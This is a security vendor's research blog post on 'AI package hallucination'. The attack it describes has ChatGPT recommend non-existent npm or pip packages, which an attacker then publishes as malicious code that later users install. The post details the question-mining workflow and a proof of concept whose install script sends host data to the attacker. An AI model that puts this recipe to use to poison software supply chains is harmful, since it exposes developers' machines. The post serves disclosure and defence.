GET A DEMO
Voyager18 (research)

Can you trust ChatGPT’s package recommendations?

ChatGPT can offer coding solutions, but its tendency for hallucination presents attackers with an opportunity. Here's what we learned.

Bar Lanyado | June 06, 2023

Contributors: Ortal Keizman, Yair Divinsky

In our research, we have discovered that attackers can easily use ChatGPT to help them spread malicious packages into developers’ environments. Given the widespread, rapid proliferation of AI tech for essentially every business use case, the nature of software supply chains, and the broad adoption of open-source code libraries, we feel an early warning to cyber and IT security professionals is necessary, timely, and appropriate. 

In this blog post, and in an upcoming webinar on June 21st, we will detail our findings including a PoC of the attack.

Why did we start this research?

Unless you have been living under a rock, you’ll be well aware of the generative AI craze. In the last year, millions of people have started using ChatGPT to support their work efforts, finding that it can significantly ease the burdens of their day-to-day workloads. That being said, there are some shortcomings. 

We’ve seen ChatGPT generate URLs, references, and even code libraries and functions that do not actually exist. These LLM (large language model) hallucinations have been reported before and may be the result of old training data.

If ChatGPT is fabricating code libraries (packages), attackers could use these hallucinations to spread malicious packages without using familiar techniques like typosquatting or masquerading. 

Those techniques are suspicious and already detectable. But if an attacker can create a package to replace the “fake” packages recommended by ChatGPT, they might be able to get a victim to download and use it.

The impact of this issue becomes clear when considering that whereas previously developers had been searching for coding solutions online (for example, on Stack Overflow), many have now turned to ChatGPT for answers, creating a major opportunity for attackers.

The attack technique – use ChatGPT to spread malicious packages

We have identified a new malicious package spreading technique we call, “AI package hallucination.”

The technique relies on the fact that ChatGPT, and likely other generative AI platforms, sometimes answers questions with hallucinated sources, links, blogs and statistics. It will even generate questionable fixes to CVEs, and – in this specific case – offer links to coding libraries that don’t actually exist. 

Using this technique, an attacker starts by formulating a question asking ChatGPT for a package that will solve a coding problem. ChatGPT then responds with multiple packages, some of which may not exist. This is where things get dangerous: when ChatGPT recommends packages that are not published in a legitimate package repository (e.g. npmjs, Pypi, etc.).

When the attacker finds a recommendation for an unpublished package, they can publish their own malicious package in its place. The next time a user asks a similar question they may receive a recommendation from ChatGPT to use the now-existing malicious package. We recreated this scenario in the proof of concept below using ChatGPT 3.5.

Popular techniques for spreading malicious packages

  1. Typosquatting
  2. Masquerading
  3. Dependency Confusion
  4. Software Package Hijacking
  5. Trojan Package
    Source: Jfrog

AI package hallucination is the root of the problem

The problem with ChatGPT package recommendations is the likely result of a specific LLM hallucination, we are calling AI package hallucination, in which ChatGPT bases its recommendations on old data and information it was trained on.

 

 

What is an LLM hallucination?

Large language models (LLMs), like ChatGPT, can sometimes lead to fascinating instances of hallucination, where the model generates creative yet unexpected responses that may not align with factual reality. Due to extensive training and exposure to vast amounts of text data, LLMs have the ability to generate plausible but fictional information, extrapolating beyond their training and potentially producing responses that seem plausible but are not necessarily accurate.

In our case, ChatGPT might guess the name of a repository based on data it found in GitHub, or other similar sources, which seems reasonable to suggest as a valid package.

As we know, ChatGPT answers are currently based on version GPT-3.5, which uses training data gathered through September 2021. Reliance on this data could also lead ChatGPT to recommend a package which was available in the past but no longer exists today.

Finding the attack vector in ChatGPT

The goal of our research was to find unpublished packages recommended for use by ChatGPT.

The first step was to find reasonable questions we can ask based on real-life scenarios.

In order to find these questions we referenced Stack Overflow to get the most popular coding questions people ask related to parsing, serialization, math, scraping, technologies (e.g Flask, ArangoDB, Istio, etc.). Altogether, we checked over 40 subjects and took the first 100 questions for each.

All of these questions were filtered with the programming language included with the question (node.js, python, go). After we collected many frequently asked questions, we narrowed down the list to only the “how to” questions.

Then, we asked ChatGPT through its API all the questions we had collected. We used the API to replicate what an attacker’s approach would be to get as many non-existent package recommendations as possible in the shortest space of time. 

In addition to each question, and following ChatGPT’s answer, we added a follow-up question where we asked it to provide more packages that also answered the query. We saved all the conversations to a file and then analyzed their answers.

In each answer, we looked for a pattern in the package installation command and extracted the recommended package. We then checked to see if the recommended package existed. If it didn’t, we tried to publish it ourselves. For this research we asked ChatGPT questions in the context of Node.js and Python.

In Node.js, we posed 201 questions and observed that more than 40 of these questions elicited a response that included at least one package that hasn’t been published.

 In total, we received more than 50 unpublished npm packages.

In Python we asked 227 questions and, for more than 80 of those questions, we received at least one unpublished package, giving a total of over 100 unpublished pip packages.

The ChatGPT 3.5 AI package hallucination PoC

In the PoC we will see a conversation between an attacker and ChatGPT, using the API, where ChatGPT will suggest an unpublished npm package named arangodb. Following this, the simulated attacker will publish a malicious package to the NPM repository to set a trap for an unsuspecting user.

Next, we show a conversation with a user asking ChatGPT the same question, where it replies with the same originally non-existent package. However, the package now exists as our malicious creation.

Finally, the user installs the package and the malicious code can execute.

The conversation between the attacker and ChatGPT

ChatGPT recommends installing the arangodb package.

The first question in the attacker’s conversation with ChatGPT:
“How to integrate with arangodb in node.js? Please return the package to install in the pattern of npm install”

The attacker’s second question, and ChatGPT’s response with a suggestion to install the arangodb package:

The suggested package does not exist in npmjs:

The hypothetical attacker writes a malicious package and publishes it to npm.

Since this is a simulation, our package won’t do anything harmful, but will be called node index.js, which we can later watch for:

In this next image, we can see the code that runs on the victim’s device when he installs the package. The program will send to the threat actor’s server the device hostname, the package it came from and the absolute path of the directory containing the module file:

The package is now available in npmjs:

The conversation between the victim and ChatGPT

Our unsuspecting victim asks a similar question as the attacker of ChatGPT, and it responds with the malicious package:

The victim installs the malicious package following ChatGPT’s recommendation.

The attacker receives data from the victim based on our preinstall call to node index.js to the long hostname:

How to spot AI package hallucinations

It can be difficult to tell if a package is malicious if the threat actor effectively obfuscates their work, or uses additional techniques such as making a trojan package that is actually functional.

Given how these actors pull off supply chain attacks by deploying malicious libraries to known repositories, it’s important for developers to vet the libraries they use to make sure they are legitimate. This is even more important with suggestions from tools like ChatGPT which may recommend packages that don’t actually exist, or didn’t before a threat actor created them.

There are multiple ways to do it, including checking the creation date, number of downloads, comments (or a lack of comments and stars), and looking at any of the library’s attached notes. If anything looks suspicious, think twice before you install it.

Next steps 

Each new vulnerability is a reminder of where we stand, and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. Vulcan Cyber named a Leader in Forrester Wave Vulnerability Risk Management
  2. OWASP Top 10 LLM risks – what we learned
  3. What the AI revolution means for cyber risk
  4. MITRE ATTACK framework – Mapping techniques to CVEs  
  5. OWASP Top 10 vulnerabilities 2022: what we learned 
  6. How to fix CVE-2023-32784 in KeePass password manager

Want to dive deeper? Join hundreds of cyber risk professionals and check out the story behind the story:

And finally… 

Don’t get found out by new vulnerabilities. Vulcan Cyber gives you full visibility and oversight of your threat environment and lets you prioritize, remediate and communicate your cyber risk across your entire organization. Get a demo today. 

 

 

dfsd

Free for risk owners

Set up in minutes to aggregate and prioritize cyber risk across all your assets and attack vectors.

"Idea for an overwhelmed secops/security team".

Name Namerson
Head of Cyber Security Strategy

strip-img-2.png